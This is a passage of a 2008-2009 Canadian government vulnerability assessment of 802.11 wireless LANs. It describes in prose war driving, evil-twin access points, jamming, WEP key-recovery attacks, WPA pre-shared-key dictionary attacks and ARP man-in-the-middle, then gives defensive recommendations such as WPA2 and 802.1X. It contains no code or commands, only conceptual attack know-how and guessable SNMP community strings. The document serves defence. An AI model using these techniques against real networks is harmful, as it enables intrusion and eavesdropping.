  • 43. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)4.4.4 WPA MIC Spoofing CountermeasureAs described earlier in this document, the Michael MIC algorithm in WPA was chosen for abalance between data integrity, security and reduced processing requirements in order to besupported on existing wireless LAN hardware. Although an improvement over the originalCRC32 used in WEP, the Michael algorithm is invertible and its key discoverable and thereforevulnerable to spoofing attacks. To address this vulnerability, designers of the WPA standardimplemented a spoofing countermeasure, which terminates the wireless connection for oneminute if more than two bad MICs are received in any one minute period. Unfortunately, thiscountermeasure is in itself a vulnerability because it may be used as a doorway to Denial-of-Service attacks (by deliberately injecting packets with bad MICs), and in noisy RFenvironments, where packet errors are common, this countermeasure can inadvertently triggerand negatively affect the robustness of the wireless network.4.5 Configuration DefaultsIn order to simplify the initial configuration process, many vendors provide a factory defaultconfiguration that provides very little security. For example, some vendor’s factory defaultspermit configuration of the AP from the wireless segment, do not implement any security, anduse documented default system settings such as IP addresses, administrator password, and SSID.Many APs also have an easily accessible reset button that will reset the device’s configurationback to these same insecure factory default settings, requiring a degree of physicalsecurity/access control to prevent.Recently, APs have been introduced which do enable security settings, but for simplicity andease of configuration, many will only use WEP with only a 40-bit key, even though strongermechanisms may actually be supported by the device.4.6 Simple Network Management Protocol (SNMP)Many 802.11 APs support management of the wireless device via SNMP. Often, this featurepermits someone to view system and configuration information, and in some cases, allows thecapability to update this information. Access to this information is normally restricted by theuse of a community string, which is not a password, but simply an identifier given to the SNMPnetwork. Further, this string is usually a well-known value, obtainable by a simple Internetsearch, or easily guessable (e.g.: “GovernmentofCanada”, “DND”, “DFAIT”). May 2009 28
  • 44. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)5 Exploits5.1 Network Discovery and Access Attacks5.1.1 GeneralWar driving is a term derived from war dialing. War dialing, a technique employed by hackersfor many years, is the use of software to automatically and systematically dial telephone numbersto discover vulnerable modems through which a hacker can connect and hack into a network.War driving exploits the same kind of vulnerability as with war dialing. A war driving attackerdrives around with a portable wireless client looking for unprotected entry points into a wirelessnetwork. War driving has become a sport among the hacking community who regularly updateInternet-accessible (e.g. www.wigle.net) maps of wireless access points for communities aroundthe world. In most cases, war driving is about the challenge of discovering a new access pointbefore any other hacker, and illicit access to networks is not performed, however manycommercial and free hacker tools which exploit the vulnerabilities described in this document,are available for all 802.11-based wireless networks and can be used by less ethical individualsfor network penetration.5.1.2 Network DiscoveryNetwork discovery tools or network auditing tools are software developed to help networkadministrators manage and trouble shoot network problems. Most network auditing tools usedby network administrators are quite sophisticated and expensive, making them unpopular for wardriving use. However, various free discovery software packages are publicly available and verysimple to use [13] to scan for networks and logs detailed information, including SSID, AP MACaddress, vendor information, signal-to-noise ratio, and whether security features are enabled. Awar driver equipped with a network discovery package, an 802.11-enabled notebook, and aGlobal Positioning System (GPS) receiver, can log the exact latitude and longitude of the APs inaddition to the information mentioned above.5.1.3 Network Access via Wireless RouterMost APs sold today also have a router built in, often with Dynamic Host Configuration Protocol(DHCP) services enabled. These wireless routers are particularly vulnerable to bandwidthhijacking attacks. When a wireless router is discovered, an attacker simply requests an IP fromthe DHCP server, or restarts his network connection and has an IP automatically assigned. Ifsecurity features are not enabled, the attacker will have complete access to the target network.Exploits September 2008 29
  • 45. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)5.2 Denial of Service (DoS) Attacks5.2.1 GeneralA DoS attack is one of the most easily and widely carried out attacks against computer networks.This type of attack usually entails taking over or overloading network resources, denyingnormal operation of the target network.5.2.2 AP TakeoverMany APs utilize SNMP or a web-based interface for configuration and management. If thecommunity/administration password is improperly configured or left in default setting, anintruder can obtain sensitive configuration information from the AP. It may be possible for theintruder to rewrite information to the AP and effectively take ownership of the AP, denyinglegitimate clients access to the network.5.2.3 AP CloningAP cloning is sometimes referred to as the “Evil Twin” attack. An attacker physically deploys amalicious AP or a laptop equipped with a wireless card and appropriate software and broadcaststhe same SSID, but with a higher RF signal strength than the target AP, causing the wirelessclients to associate themselves to this rogue AP. Most client cards will, by default, switch overto the more powerful AP to ensure connectivity. Typically, the clients will automaticallyauthenticate with the new AP, thus providing the attacker with a set of valid credentials whichcan then be used to connect with the real AP. The attacker who controls the malicious AP alsohas the opportunity to exploit any security weakness that may be present on the clients devicesfalsely associated with the rogue base station. AP cloning is more difficult than simply denyingclients access to a base station because it requires the physical deployment of a modified AP orlaptop and wireless card that has a more powerful output or is located physically closer than theoriginal AP.5.2.4 RF JammingAn RF jamming attack is not the same type of attack as overloading of network resources.Instead of creating spurious data to overwhelm the processing capability of network devices, RFjamming overwhelms the medium used for transmission, in this case, radio waves. An attackerwith very simple tools can easily flood the medium for the network (in the case of 802.11b/g/n,the 2.4GHz radio frequency band) with noise. RF jamming is very effective because it worksagainst all WLAN security safeguards. When noise is injected at the WLAN operatingfrequency, signal-to-noise ratio drops below acceptable level and the network simply ceases tofunction. May 2009 30
  • 46. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)5.3 WEP Protocol Attack5.3.1 GeneralThe optional WEP algorithm defined in the IEEE 802.11 standard was intended to provide dataconfidentiality equivalent to that of a basic unprotected wired network. Many reports andarticles [10,11,14,15] have been published describing attacks exploiting the various weaknessesand design flaws in the WEP protocol. These attacks are easy to perform using readily availableequipment. The attacks apply equally to 40-bit and the 104-bit versions of WEP, as well as othernon-standard key length variants.5.3.2 Passive AttackPassive attacks exploit the keystream IV re-use weakness caused by the poor implementation ofthe RC4 algorithm by WEP. An eavesdropper intercepts all wireless traffic, collects packetswhere IV collisions occur, and performs statistical analysis of these packets to obtain theencryption key. The encryption key can then be used to access the WLAN. Tools that performthis type of attack are freely available on the Internet [15,16].5.3.3 Active AttacksA couple of different types of active attacks are possible against an 802.11 WLAN installation.The first type of active attack involves creating or modifying packets for injecting into thenetwork for malicious purposes and requires access to the wired side of the network. Injectingpackets in plaintext and then intercepting the encrypted version of this known packet as it isbroadcast over the wireless network allows an attacker to extract the keystream used forencryption. Malicious commands or viruses can also be injected into the network using this typeof attack.The other type of active attack is possible entirely from the wireless side of the network. Thisclass of attack, which includes spoofing attacks, man-in-the-middle and packet injection attacksare all possible from the wireless side of the network. For example, an active version of anattack against the IV re-use vulnerability of WEP is possible and involves spoofing and injectingpackets onto the wireless network, which results in many packets with different IVs beingreturned. Because of this property, this active attack can dramatically cut down on the packetcollection time required in the passive version of the attack described above and can result in anattacker breaking WEP in seconds or minutes as opposed to hours or days. Similarly, an activeattack against the weak CRC integrity check [22] is possible by intercepting an encrypted packet,modifying selected portions of the packet that are not adequately protected by the CRC andreplacing them with a guessed value and re-broadcasting the modified packet. By progressivelyguessing and replacing various portions of a packet and watching the re-transmission behaviour,it is possible for an attacker to decrypt WEP-encrypted packets without prior knowledge of thekey.Although active attacks can be extremely effective, they are in general more difficult toExploits September 2008 31
  • 47. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)implement and accomplish than a passive attack and require a more in-depth understanding ofboth the protocols involved as well as some degree of RF knowledge. In addition, an activeattack carries a far greater risk of being detected as packets must be broadcast or injected into thenetwork by the attacker.5.3.4 Decryption Table AttackUsing the attacks described in previous articles, an attacker can determine multiple keystreamsand build a decryption table that could be used to decrypt each packet that uses the same IV.Since the IV is transmitted as plaintext, it would be easy to match an IV to the keystream in thetable and decode the message accordingly. The decryption table can further be used to createnew packets with known keystreams and create false packets to inject into the network.Building this table would require the hacker to record only 1500 bytes of the keystream for eachof the 224 possible IVs, or roughly 24 GB of space [9]. The difficulty level of determiningkeystreams depends on the size of the IV (24-bit), not the shared key (40-bit). WLANs that use104-bit(128-bit) key are more difficult to attack in this way, but they are still vulnerable.5.4 WPA/WPA2 Attacks5.4.1 GeneralThe WPA and WPA2 security enhancements to 802.11 greatly improve the security androbustness of wireless networks implementing these measures. Although weaknesses andvulnerabilities still exist, comparatively few practical exploits have been found.5.4.2 Pre-Shared Key Dictionary AttackWPA and WPA2 attempt to strengthen security by using multiple keys for all operations,however in the case where a Pre-Shared Key is used; all these additional keys are derived fromthe shared key, which can be recovered by dictionary or even brute-force attacks on the secondmessage of the 802.11i 4-Way Handshake process. A number of freely available tools to exploitthis weakness are available. Exploitation of the PSK vulnerability is mitigated through the useof 802.1X server-based authentication, however if the PSK mechanism must be used, a long,non-dictionary passphrase is required.5.5 Monitoring and Interception Attacks5.5.1 GeneralMonitoring and interception attacks involve passive information gathering. The vulnerability ofthis type of attack is not apparent but it is equally dangerous and should not be overlooked. May 2009 32
  • 48. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)5.5.2 Traffic SniffingOnce the target wireless network is identified using network discovery techniques, an attackercan setup and sniff any traffic on the target network. Modified versions of device drivers allowthe hacker’s wireless client card to operate in the promiscuous mode, making this passive attackstealthy and untraceable. The only constraint is that the attacker must be within the range of thewireless network, but this range can easily be extended to couple hundreds metres with the useof an antenna.Since the 802.11 packet format is a known standard, captured packets can be analyzed to obtaincritical information. This information can then be used to aid attacks against WEP if thissecurity feature was enabled. Some commercially available products [17,18] can do this analysisin real-time as the packets are captured.5.5.3 Broadcast MonitoringUnlike a switch, a hub broadcasts all traffic to all connected devices rather than to the intendedrecipient. An AP connected to a hub rather than to a switch will potentially receive andrebroadcast data packets not intended for wireless clients. This will allow an attacker to monitorsensitive traffic on the wired side of the network.5.5.4 Man-in-the-Middle AttackMost 802.11 APs act as transparent MAC layer bridges, which allow Address ResolutionProtocol (ARP) packets to be passed between the wired and wireless networks. Thisimplementation allows for the man-in-the-middle attack against two machines on the wirednetwork connected to the same switch or hub as the AP. Using forged ARP packets, traffic canbe redirected through the attacker’s wireless client before it can reach both targeted hosts.Exploits September 2008 33
  • 49. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)This page intentionally left blank. May 2009 34
  • 50. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)6 Solutions6.1 OverviewThe following articles provide some interim guidelines that are essential to achieve some degreeof confidence in the secure operation of a WLAN. Solutions for a more secure WLANenvironment will be published as they become available. In the meantime, the followingmeasures should be implemented to immediately enhance the security posture of the WLAN:a. Determine the range of your network coverage and keep it small;b. Do not broadcast your SSID;c. Do not use the default SSID;d. Use WPA2;e. Use 802.1X Server-based authentication;f. Change the keys frequently;g. Use a VPN and Firewall to further isolate the WLAN; andh. Use a personal firewall on every wireless client.i. Consider using Wireless Intrusion Detection/Prevention Systems6.2 Determine Range of Your Network CoverageUse a wireless sniffer, or any laptop capable of using the 802.11b network, to determine how faraway from each access point your WLAN is accessible. This will give you a good idea of howclose an unsophisticated attacker or eavesdropper will need to be to have access to your network. Remember that high-gain antennas and/or amplifiers can be used to intercept radiocommunications from a much greater distance. If the data traveling on your WLAN is extremelyvaluable or sensitive and could potentially be sought by individuals having access to moresophisticated equipment, you will have to take this into account when determining the coverageof your WLAN.If your WLAN coverage extends into an adjacent public area, parking lot, or simply too far foryour comfort, additional security measures will be needed. Some brands of WLAN devicesallow you to change the transmit power level: setting this level to a lower level will help reducethe coverage range and the risk of unauthorized WLAN access or eavesdropping. Retrofittingthe standard omni-directional antennas with antenna reflectors or replacing them with directionalantennas will help focus the RF energy towards desired coverage areas and away from undesiredareas, and are also a very effective and relatively inexpensive means of controlling WLANcoverage. Completely preventing radio transmissions from leaving your building may bepossible by employing a Faraday cage1. For highly sensitive information where wireless access1 A grounded “cage” structure that is designed to electrically screen an area. This can also be accomplished through the use of conductive wall, floor and ceiling tiles, or conductive paints. A Faraday cage can beSolutions May 2009 35
  • 51. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)is also a requirement, this must be considered. Physical measures of this type are extremelyexpensive and probably not cost effective for most cases so the use of strong encryption toprotect the information would provide a suitable alternative.6.3 Do Not Broadcast Your SSIDThe APs from most vendors are set up by default to broadcast the network name or SSID of thenetwork. This allows users to see and join the network quickly and easily. Wardrivers areattackers who drive through cities with wireless sniffers to find and log all networks that arebroadcasting their presence. If wireless security features are not enabled on your WLAN,anyone who can see your network can join it. Most vendors allow you to turn off the broadcastSSID feature. This is not a complete security solution but it will provide some protection againstcasual attacks and eavesdropping.6.4 Do Not Use the Default SSIDMost APs use well-known defaults as their SSIDs. Using these defaults defeats the effectivenessof disabling SSID broadcast (because default SSIDs are well known) and render the system morevulnerable. Again, this does not represent a complete security solution but addressing thisconcern does provide some protection against casual attacks and eavesdropping.6.5 Use WPA2The original wireless security mechanism, WEP, has been shown to be weak and ineffective as asecurity measure, and due to the prevalence of freely available “WEP-cracking” programs, willonly deter casual attempts at eavesdropping. The latest WPA2/802.11i security standard isstrong (particularly when 802.1X authentication is also used, see next section), addressesvirtually all of the weaknesses of WEP and utilizes a very strong AES-based encryption. CSErecommends that WPA2 must be used on all 802.11 wireless networks, particularly wheresecurity and privacy are important.Therefore, only hardware supporting WPA2 wireless security should be considered for newpurchases and older existing equipment which does not support WPA2 should be upgraded orreplaced wherever possible.When security and privacy are paramount, even WPA2 may not be sufficient and other optionsshould be considered. For example, the addition of strong data encryption products such asVPNs would greatly reduce this security risk. used to screen out emitted signals from information systems and can also be employed to protect against lightning strikes and other high energy emissions. May 2009 36
  • 52. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)6.6 Use 802.1X Server-based AuthenticationThus far, WPA2 has been found to be a robust security mechanism with comparatively fewvulnerabilities, however it may be strengthened further though the use of 802.1X server-basedauthentication. Use of an external server allows implementation of user-based authenticationand access control as well as integration with existing security mechanisms that may be in place,including, but not limited to smart cards, security tokens, PKI, biometrics, etc.6.7 Change the Key FrequentlyWhenever using encryption, the encryption key needs to be changed frequently in order tominimize the amount of data that may be processed with any one key. This makes it moredifficult for an attacker to collect sufficient data to compromise the key. It also reduces theamount of time that a compromised key may be useful to an attacker. This also applies to theencryption used in WLAN products- if 802.1X server-based authentication is not available andthe Pre-Shared Key mode must be used, it is imperative that the passphrase be changed on aregular basis to ensure the security of the network.6.8 Use a VPN and Firewall to Isolate the WLANIn most cases, the coverage of a WLAN extends outside of the physical security at a location.Therefore, the WLAN should be treated as a hostile network, just as the Internet is. A networkfirewall should be used to separate the internal wired LAN from the WLAN access point and allwireless clients. A VPN, Secure Shell (SSH) tunneling and end-to-end encryption areappropriate supplemental solutions to protect traffic on and between the wired LAN and theWLAN.6.9 Use a Personal Firewall on Every Wireless ClientWireless clients are very exposed. They require protection in the form of personal firewalls tofilter both incoming and outgoing traffic. Some of these products may be used to provideenhanced authentication capabilities as well.6.10 Consider Wireless Intrusion Detection/Prevention SystemsWireless Intrusion Detection System (WIDS) and Wireless Intrusion Prevention System (WIPS)products are now available to complement intrusion detection systems designed for wiredinfrastructure. These systems utilize sensors in the form of specialized wireless receivers tomonitor a coverage area for attempts to access the protected network from unauthorized clients.Additionally, the system will monitor for rogue access points, misconfigured access points, useof ad-hoc network connections, attempts at MAC address spoofing and attempts at launchingdenial-of-service attacks. By placing many sensors in the coverage area, a WIDS may evendetermine the physical location of an intruder by triangulation and, for example, plot thislocation on a building map. Wireless Intrusion Prevention products may also feature activedefenses against unauthorized access: some of these systems can transmit specially-craftedSolutions May 2009 37
  • 53. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)packets which can prevent an unauthorized client from gaining access to a network, disable arogue or misconfigured access point, or even prevent some forms of wireless denial-of-service.Note however that these crafted packets are often non-802.11 standard compliant and testingshould be done before enabling these active intrusion prevention features to ensure that there isno blockage or interference with legitimate traffic and devices. May 2009 38
  • 54. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)7 Future WorkCSEC continues to research solutions that will mitigate the vulnerabilities associated withWLANs, and will release updates to this publication whenever new pertinent informationbecomes available. CSEC is in the process of developing a recommendation for secure-WLANarchitecture for the GC which will further mitigate risks.In the meantime, GC departments may contact CSEC client services to obtain current advice andrecommendations regarding security of WLANs: client.svcs@cse-cst.gc.ca or (613) 991-7654.Future Work May 2009 39
  • 55. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)This page intentionally left blank. May 2009 40
  • 56. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)8 Conclusions and RecommendationsUnlike wired LANs, the WLAN exists on a medium without physical bounds. With a WLAN,transmitted data is broadcast over the air using radio waves that can be received by any WLANclient in the area served by the data transmitter. Because radio waves travel through ceilings,floors and walls, transmitted data may reach unintended recipients on different floors and evenoutside the building of the transmitter. This creates major security concerns as the side effect ofthe mobility and convenience a WLAN offers.The latest revisions to the IEEE 802.11 standard specify an improved security mechanism:802.11i or WPA2 for authentication and data confidentiality. This mechanism offers strongAES-based encryption and support for virtually any authentication scheme via 802.1X. When astrong authentication method is chosen, 802.11i/WPA2 addresses the weaknesses of andsupersedes all previous security mechanisms including WEP and WPA. Based on these findings,CSEC recommends that the WPA2 security mechanism must be enabled for all GC 802.11-based WLANs; older hardware must be upgraded or replaced with devices that support WPA2.In cases where older hardware cannot be immediately upgraded or replaced, the strongestsecurity mechanism available (WPA if possible, WEP if not) should be enabled according toguidelines documented here, and supplemental security measures such as VPNs must also beimplemented to mitigate the risks associated with the weak security mechanisms in the wirelesshardware.Note however that even the strengthened measures in WPA2 are strictly only intended to provideprotection for a WLAN against casual unauthorized eavesdropping and to ensure data integrity.Because many aspects of WPA2 are optional or require additional external components forstrongest security, it is possible for these features to be disabled, and indeed, in most out-of-the-box “Plug-and-Play” deployments of WLAN hardware, very weak default security settings arenorm and all that is required for an unauthorized user to be able to observe wireless traffic oreven join a corporate network is to obtain the SSID, which can be easily discovered throughreadily available hardware and software tools. Additionally, because it is difficult to devise onesingle solution to address all of the complex security issues faced by the WLAN standard, WPA2should not be considered adequate in providing privacy protection in situations whereparticularly sensitive information may be transmitted over wireless networks. In such situationssupplemental security measures must be considered.Conclusions and Recommendations May 2009 41
  • 57. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)This page intentionally left blank. May 2009 42
  • 58. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)9 References[1] “International Standard ISO/IEC 8802-11:1999(E); ANSI/IEEE Std 802.11, 1999 Edition; IEEE Standard for Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications.” International Organization for Standardization, International Electrotechnical Commission, and The Institute of Electrical and Electronics Engineers, 1999.[2] “IEEE Std 802.11a-1999 (Supplement to ANSI/IEEE Std 802.11-1999), Supplement to International Standard ISO/IEC 8802-11:1999(E); ANSI/IEEE Std 802.11, 1999 Edition; IEEE Standard for Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: Higher-Speed Physical Layer Extension in the 5 GHz Band,” International Organization for Standardization, International Electrotechnical Commission, and The Institute of Electrical and Electronics Engineers, 1999.[3] “IEEE Std 802.11b-1999 (Supplement to ANSI/IEEE Std 802.11-1999), Supplement to International Standard ISO/IEC 8802-11:1999(E); ANSI/IEEE Std 802.11, 1999 Edition; IEEE Standard for Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: Higher-Speed Physical Layer Extension in the 2.4 GHz Band,” International Organization for Standardization, International Electrotechnical Commission, and The Institute of Electrical and Electronics Engineers, 1999.[4] “Wi-Fi: The Standard for Wireless Fidelity,” Wireless Ethernet Compatibility Alliance (WECA) Ltd. [Online]. Available: http://www.wirelessethernet.org[5] “Wi-Fi System Interoperability Test Plan, Version 1.0,” Wireless Ethernet Compatibility Alliance, February 2000. [Online]. Available: http://www.wirelessethernet.org[6] W. A. Arbaugh, N. Shankar, and Y.J. Wan, “Your 802.11 wireless network has no clothes,” University of Maryland, College Park, Maryland, March 2001. [Online]. Available: http://www.cs.umd.edu/~waa/wireless.pdf[7] J. R. Walker, “Unsafe at any key size: An analysis of the WEP encapsulation,” Intel Corp., Hillsboro, OR, October 2000. Doc.: IEEE 802.11-00/362. [Online]. Available: http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/0-362.zip[8] J. R. Walker, “Overview of 802.11 Security,” Intel Corp., Hillsboro, OR, March 2000. Doc.: IEEE 802.15-01/154. [Online]. Available: http://grouper.ieee.org/groups/802/15/pub/2001/Mar01/01154r0P802-15_TG3-Overview-of-802- 11-Security.ppt[9] N. Borisov, I. Goldberg, and D. Wagner, “Intercepting Mobile Communications: The Insecurity ofReferences May 2009 43
  • 59. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) 802.11,” UC Berkeley. Presented at the Seventh Annual International Conference on Mobile Computing and Networking, July 2001. [Online]. Available: http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf[10] W. A. Arbaugh, “An inductive chosen plaintext attack against WEP/WEP2,” University of Maryland, College Park, Maryland, May 2001. Doc.: IEEE 802.11-01/230r1. [Online]. Available: http://grouper.ieee.org/groups/802/11/Documents/DocumentHolder/1-230.zip[11] S. Fluhrer, I. Mantin, A. Shamir, “Weakness in the Key Scheduling Algorithm of RC4.” Eighth Annual Workshop on Selected Areas in Cryptography, August 2001.[12] “Network Stumbler,” software. [Online]. Available: http://www.netstumbler.com[13] A. Stubblefield, J. Ioannidis, A.D. Rubin, “Using the Fluhrer, Mantin, and Shamir Attack to Break WEP,” Rice University, AT&T Labs, August 2001. AT&T Tech. Report TD-4ZCPZZ. [Online]. Available: http://www.cs.rice.edu/~astubble/[14] N. Borisov, I. Goldberg, and D. Wagner, “(In)Security of the WEP algorithm,” UC Berkeley. [Online]. Available: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html[15] “AirSnort,” software. [Online]. Available: http://airsnort.sourceforge.net[16] “WEPCrack,” software. [Online]. Available: http://wepcrack.sourceforge.net[17] “Sniffer Wireless Pro,” software. [Online]. Available: http://www.sniffer.com[18] “AiroPeek,” software. [Online]. Available: http://www.wildpackets.com[19] B. Fleck, J. Dimov, “Wireless Access Points and ARP Poisoning: Wireless vulnerabilities that expose the wired network,” Cigital, Inc. [Online]. Available: http://www.cigitallabs.com/resources/papers/download/arppoison.pdf[20] A. Mishra, W. Arbaugh, “An Initial Analysis of the IEEE 802.1X Standard”, February 2002.[21] “Establishing Wireless Robust Security Networks- A Guide to IEEE 802.11i”, NIST Publication Number 800-97, Feb 2007.[22] Lehembre, Guillame, “Wi-Fi Security – WEP, WPA and WPA2”, June 2005, Hakin9.org newsletter May 2009 44

×